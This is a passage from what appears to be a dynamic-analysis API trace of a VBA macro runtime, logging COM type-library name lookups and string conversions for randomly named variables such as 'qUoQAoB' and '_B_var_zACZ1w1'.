lpMultiByteStr=0x4b10d6e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_dAAQQcA") returned 15 [0069.055] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_dAAQQcA", lHashVal=0x10fefe, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0) returned 0x0 [0069.055] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62126 | out: _Dst=0x144ec0) returned 0x0 [0069.056] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qUoQAoB", lHashVal=0x108db7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qUoQAoB") returned 8 [0069.056] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qUoQAoB", lHashVal=0x108db7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qUoQAoB") returned 8 [0069.056] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qUoQAoB", lHashVal=0x108db7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.056] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qUoQAoB") returned 0x108db7 [0069.056] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="VB_MemberFlags", cchCount1=-1, lpString2="qUoQAoB", cchCount2=-1) returned 3 [0069.056] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="qUoQAoB" | out: _Dst="qUoQAoB") returned 0x0 [0069.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="qUoQAoB") returned 8 [0069.056] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.056] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qUoQAoB", lHashVal=0x108db7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.056] IUnknown:Release (This=0x665ba50) returned 0xd [0069.056] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.056] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qUoQAoB", lHashVal=0x108db7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.056] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.056] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.056] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qUoQAoB", lHashVal=0x108db7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.056] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.056] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.056] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qUoQAoB", lHashVal=0x108db7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.056] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qUoQAoB") returned 8 [0069.056] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qUoQAoB", lHashVal=0x108db7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.057] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.057] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a620fe | out: _Dst=0x67c2d40) returned 0x0 [0069.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qUoQAoB") returned 0x10913b [0069.057] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_qUoQAoB" | out: _Dst="_B_var_qUoQAoB") returned 0x0 [0069.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_qUoQAoB") returned 15 [0069.057] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.057] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qUoQAoB", lHashVal=0x10913b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.057] IUnknown:Release (This=0x665ba50) returned 0xd [0069.057] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.057] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qUoQAoB", lHashVal=0x10913b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.057] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.057] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.057] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qUoQAoB", lHashVal=0x10913b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.057] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.057] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.057] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qUoQAoB", lHashVal=0x10913b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.057] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.057] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.057] IUnknown:Release (This=0x665ba50) returned 0xd [0069.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10d9e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_qUoQAoB") returned 15 [0069.057] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qUoQAoB", lHashVal=0x10913b, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.057] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a620fe | out: _Dst=0x144ec0) returned 0x0 [0069.057] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qUD1GD", lHashVal=0x10240c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62176, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qUD1GD") returned 7 [0069.058] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qUD1GD", lHashVal=0x10240c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62176, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qUD1GD") returned 7 [0069.058] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qUD1GD", lHashVal=0x10240c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.058] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qUD1GD") returned 0x10240c [0069.058] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="qUD1GD" | out: _Dst="qUD1GD") returned 0x0 [0069.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="qUD1GD") returned 7 [0069.058] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.058] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qUD1GD", lHashVal=0x10240c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.058] IUnknown:Release (This=0x665ba50) returned 0xd [0069.058] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.058] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qUD1GD", lHashVal=0x10240c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.058] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.058] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.058] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qUD1GD", lHashVal=0x10240c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.058] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.058] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.058] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qUD1GD", lHashVal=0x10240c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.058] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62176, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qUD1GD") returned 7 [0069.058] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qUD1GD", lHashVal=0x10240c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.058] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.058] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62176 | out: _Dst=0x67c2d40) returned 0x0 [0069.059] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qUD1GD") returned 0x109eb5 [0069.059] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_qUD1GD" | out: _Dst="_B_var_qUD1GD") returned 0x0 [0069.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_qUD1GD") returned 14 [0069.059] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.059] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qUD1GD", lHashVal=0x109eb5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.059] IUnknown:Release (This=0x665ba50) returned 0xd [0069.059] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.059] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qUD1GD", lHashVal=0x109eb5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.059] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.059] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.059] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qUD1GD", lHashVal=0x109eb5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.059] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.059] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.059] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qUD1GD", lHashVal=0x109eb5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.059] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.059] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.059] IUnknown:Release (This=0x665ba50) returned 0xd [0069.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10dce, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_qUD1GD") returned 14 [0069.059] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qUD1GD", lHashVal=0x109eb5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x47003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x47003100000000, pDummy=0x0) returned 0x0 [0069.059] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62176 | out: _Dst=0x144ec0) returned 0x0 [0069.059] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zACZ1w1", lHashVal=0x10c59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6219e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zACZ1w1") returned 8 [0069.059] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zACZ1w1", lHashVal=0x10c59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6219e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zACZ1w1") returned 8 [0069.060] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zACZ1w1", lHashVal=0x10c59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.060] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zACZ1w1") returned 0x10c59e [0069.060] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="zACZ1w1" | out: _Dst="zACZ1w1") returned 0x0 [0069.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="zACZ1w1") returned 8 [0069.060] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.060] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zACZ1w1", lHashVal=0x10c59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.060] IUnknown:Release (This=0x665ba50) returned 0xd [0069.060] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.060] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zACZ1w1", lHashVal=0x10c59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.060] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.060] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.060] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zACZ1w1", lHashVal=0x10c59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.060] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.060] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.060] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zACZ1w1", lHashVal=0x10c59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.060] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6219e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zACZ1w1") returned 8 [0069.060] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zACZ1w1", lHashVal=0x10c59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.060] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.060] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6219e | out: _Dst=0x67c2d40) returned 0x0 [0069.060] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zACZ1w1") returned 0x10b9a1 [0069.060] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_zACZ1w1" | out: _Dst="_B_var_zACZ1w1") returned 0x0 [0069.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_zACZ1w1") returned 15 [0069.060] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.060] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zACZ1w1", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.061] IUnknown:Release (This=0x665ba50) returned 0xd [0069.061] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.061] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zACZ1w1", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.061] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.061] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.061] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zACZ1w1", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.061] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.061] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.061] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zACZ1w1", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.061] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.061] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.061] IUnknown:Release (This=0x665ba50) returned 0xd [0069.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10dfe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_zACZ1w1") returned 15 [0069.061] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zACZ1w1", lHashVal=0x10b9a1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x31005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x31005a00000000, pDummy=0x0) returned 0x0 [0069.061] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6219e | out: _Dst=0x144ec0) returned 0x0 [0069.061] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WQAAZGAA", lHashVal=0x10be9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a621c6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQAAZGAA") returned 9 [0069.061] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WQAAZGAA", lHashVal=0x10be9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a621c6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQAAZGAA") returned 9 [0069.061] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WQAAZGAA", lHashVal=0x10be9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.061] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WQAAZGAA") returned 0x10be9f [0069.061] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="WQAAZGAA" | out: _Dst="WQAAZGAA") returned 0x0 [0069.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="WQAAZGAA") returned 9 [0069.062] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.062] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WQAAZGAA", lHashVal=0x10be9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.062] IUnknown:Release (This=0x665ba50) returned 0xd [0069.062] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.062] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WQAAZGAA", lHashVal=0x10be9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.062] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.062] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.062] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WQAAZGAA", lHashVal=0x10be9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.062] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.062] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.062] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WQAAZGAA", lHashVal=0x10be9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.062] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a621c6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQAAZGAA") returned 9 [0069.062] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WQAAZGAA", lHashVal=0x10be9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.062] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.062] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a621c6 | out: _Dst=0x67c2d40) returned 0x0 [0069.062] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WQAAZGAA") returned 0x109628 [0069.062] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_WQAAZGAA" | out: _Dst="_B_var_WQAAZGAA") returned 0x0 [0069.062] MultiByteToWideChar (in: 